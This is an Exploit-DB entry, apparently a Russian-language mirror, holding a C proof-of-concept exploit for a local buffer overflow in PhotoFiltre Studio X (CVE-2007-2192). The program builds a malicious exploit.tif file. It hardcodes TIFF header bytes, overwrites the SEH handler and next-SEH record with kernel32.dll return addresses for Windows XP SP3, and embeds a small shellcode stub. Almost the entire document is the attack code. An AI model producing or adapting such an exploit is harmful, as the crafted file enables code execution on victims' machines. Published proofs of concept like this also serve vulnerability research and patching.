- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 12497
- Проверка EDB
-
- Пройдено
- Автор
- FL0 FL0W
- Тип уязвимости
- LOCAL
- Платформа
- WINDOWS
- CVE
- cve-2007-2192
- Дата публикации
- 2010-05-04
C:
#include<stdio.h>
#define fisier FILE
#define ALOC(tip,n) (tip*)malloc(sizeof(tip)*n)
#define VER "10.3.0"
#define POCNAME "[*]PhotoFiltre Studio X .tif file local buffer overflow poc(0day)"
#define AUTHOR "[*]fl0 fl0w"
typedef char i8;
typedef short i16;
typedef int i32;
void gen_random(i8*,const int);
void print(i8*);
i32 mcpy(void*,const void*,i32);
void fwi32(fisier*,i32);
i32 filerr(fisier*);
void error(void);
void filebuild();
unsigned int getFsize(fisier*,i8*);
i32 sizes[]={257,163,217,213,940,29};
typedef struct {
/*Retcodes from MS Windows xp pro sp3
*/
i32 popopret;
i32 jmpbyte;
i32 jmpEBP;
}instr;
i32 main()
{filebuild();
printf("%s\n%s\n",POCNAME,AUTHOR);
print("file done");
getchar();
}
void filebuild() {
/*The logic: overwrite seh handler with pop pop ret,overwrite next seh with
jmp ebp,find the exact location ebp points to and write a jmp 0x40 bytes instr.
Because there isn't space for shellcode I chose this jmp ebp option.
And a egghunter wouldn't be the solution because u also need space for it.
*/
i8 tif1[]= {
0x49, 0x49, 0x2A, 0x00, 0x08, 0x00, 0x00, 0x00, 0x17, 0x00, 0xFE, 0x00, 0x04, 0x00, 0x01, 0x00,
0x00, 0x00, 0x02, 0x00, 0x00, 0x00, 0x00, 0x01, 0x04, 0x00, 0x01, 0x00, 0x00, 0x00, 0xFD, 0x01,
0x00, 0x00, 0x01, 0x01, 0x04, 0x00, 0x01, 0x00, 0x00, 0x00, 0xB6, 0x01, 0x00, 0x00, 0x02, 0x01,
0x03, 0x00, 0x01, 0x00, 0x00, 0x00, 0x08, 0x00, 0x00, 0x00, 0x03, 0x01, 0x03, 0x00, 0x83, 0x00,
0x00, 0x00, 0x05, 0x00, 0x00, 0x00, 0x06, 0x01, 0x03, 0x00, 0x01, 0x00, 0x00, 0x00, 0x03, 0x00,
0x00, 0x00, 0x0A, 0x01, 0xB6, 0x00, 0x01, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x11, 0x01,
0x04, 0x00, 0x37, 0x00, 0x00, 0x00, 0x22, 0x01, 0x00, 0x00, 0x12, 0x01, 0x03, 0x00, 0x01, 0x00,
0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x15, 0x01, 0x03, 0x00, 0x01, 0x00, 0x00, 0x00, 0x01, 0x00,
0x00, 0x00, 0x16, 0x01, 0x03, 0x00, 0x01, 0x00, 0x00, 0x00, 0x08, 0x00, 0x00, 0x00, 0x17, 0x01,
0x04, 0x00, 0x37, 0x00, 0x00, 0x00, 0xFE, 0x01, 0x00, 0x00, 0x1A, 0x01, 0x05, 0x00, 0x01, 0x00,
0x00, 0x00, 0xDA, 0x02, 0x00, 0x00, 0x1B, 0x01, 0x05, 0x00, 0x01, 0x00, 0x00, 0x00, 0xE2, 0x02,
0x00, 0x00, 0x1C, 0x01, 0x03, 0x00, 0x01, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x28, 0x01,
0x03, 0x00, 0x01, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00, 0x29, 0x01, 0x03, 0x00, 0x02, 0x00,
0x00, 0x00, 0x00, 0x00, 0x01, 0x43, 0x43, 0xEB, 0x05, 0x8C, 0x08, 0xFC, 0x7F, 0x43, 0x55, 0x89,
0xE5, 0x83, 0xEC, 0x18, 0xC7, 0x45, 0xFC, 0x77, 0x7A, 0x83, 0x7C, 0xC7, 0x44, 0x24, 0x04, 0xD0,
0x03, 0x00, 0x00, 0xC7, 0x04, 0x24, 0x01, 0x0E, 0x00, 0x00, 0x8B, 0x45, 0xFC, 0xFF, 0xD0, 0xC9,0xC3,
};
i8 tif2[]= {
0x92, 0x00, 0x92, 0x00, 0x96, 0x00, 0x00, 0x00, 0x00, 0x00, 0xAF, 0x00, 0x12, 0x00, 0x00, 0x00,
0x92, 0x00, 0x49, 0x00, 0x12, 0x00, 0x92, 0x00, 0xAF, 0x00, 0x92, 0x00, 0x49, 0x00, 0x49, 0x00,
0x49, 0x00, 0x58, 0x00, 0xAF, 0x00, 0x12, 0x00, 0x58, 0x00, 0x00, 0x00, 0x80, 0x00, 0x00, 0x00,
0x57, 0x00, 0x12, 0x00, 0x5A, 0x00, 0x12, 0x00, 0x00, 0x00, 0x00, 0x00, 0x28, 0x00, 0x12, 0x00,
0x00, 0x00, 0x46, 0x00, 0xFD, 0x00, 0xD5, 0x00, 0x1B, 0x00, 0xFF, 0x00, 0xEF, 0x00, 0xA9, 0x00,
0xD9, 0x00, 0x00, 0x00, 0x70, 0x00, 0x6C, 0x00, 0xFA, 0x00, 0x99, 0x00, 0xC5, 0x00, 0xF7, 0x00,
0xB4, 0x00, 0x48, 0x00, 0xAB, 0x00, 0xE9, 0x00, 0xDE, 0x00, 0x1B, 0x00, 0xFF, 0x00, 0xD7, 0x00,
0x64, 0x00, 0xA9, 0x00, 0xD9, 0x00, 0x6E, 0x00, 0x68, 0x00, 0x70, 0x00, 0x92, 0x00, 0xCC, 0x00,
0xF2, 0x00, 0x99, 0x00, 0x94, 0x00, 0xE9, 0x00, 0xAD, 0x00, 0xB4, 0x00, 0x4B, 0x00, 0xC9, 0x00,
0x85, 0x00, 0xE9, 0x00, 0xE5, 0x00, 0xB4, 0x00, 0x80, 0x00, 0x98, 0x00, 0x8C, 0x00, 0xE0, 0x00,
0xC4, 0x00, 0x33,
};
/* tif1sz=v[1]
tif2sz[]=v[2]
sehoffset=v[3]
nsehoffset=v[4]
junksz=v[5]
jmpebpoffset=v[6] */
fisier* in=fopen("exploit.in","r"),
* out=fopen("exploit.tif","wb");
//i8 buf=ALOC(i8,100001);
i8 buf[100001];
instr* ASM;
ASM=ALOC(instr,sizeof(instr));
ASM->popopret=0x7C86CFC2;//pop esi pop edi ret from kernel32.dll
ASM->jmpbyte=0xeb400300;//jmp over(u need to cause a exception NOT a exit call,so work on the instr)
ASM->jmpEBP=0x7C81ACD3;//JMP EBP from kernel32.dll
memcpy(tif1+217,&ASM->popopret,4);
memcpy(tif1+213,&ASM->jmpEBP,4);
memcpy(tif1+29,&ASM->jmpbyte,4);
if(out){
fwrite(tif1,sizeof(i8),sizeof(tif1),out);
gen_random(&buf,940);
fwrite(&buf,sizeof(i8),940,out);
fwrite(tif2,sizeof(i8),sizeof(tif2),out);
fclose(out);
free(buf);
}
else {
error();
}
}
void error(void) {
perror("\nError:");
}
i32 filerr(fisier* F) {
return (ferror(F));
}
void readf(void) {
}
void fwi32(fisier* F,i32 adr) {
fputc(adr&0xff,F);
fputc((adr>>8)&0xff,F);
fputc((adr>>16)&0xff,F);
fputc((adr>>24)&0xff,F);
}
i32 mcpy(void* dest,const void* source,i32 len)
{ void* D=dest;
const void* S=source;
len=sizeof(source);
memcpy(D,S,len);
return (len);
}
void print(i8* msg)
{
printf("[*]%s\n",msg);
}
void gen_random(i8* s,const int len)
{ i32 i;
static const i8 alphanum[]= {
"0123456789ABCDEFGHIJKLMNOPQRST"
"UVWXYZabcdefghijklmnopqrstuvwxyz"};
for(i=1;i<len;++i)
{
s[i]=alphanum[rand()%(sizeof(alphanum)-1)];
}
s[len]=0;
}
- Источник
- www.exploit-db.com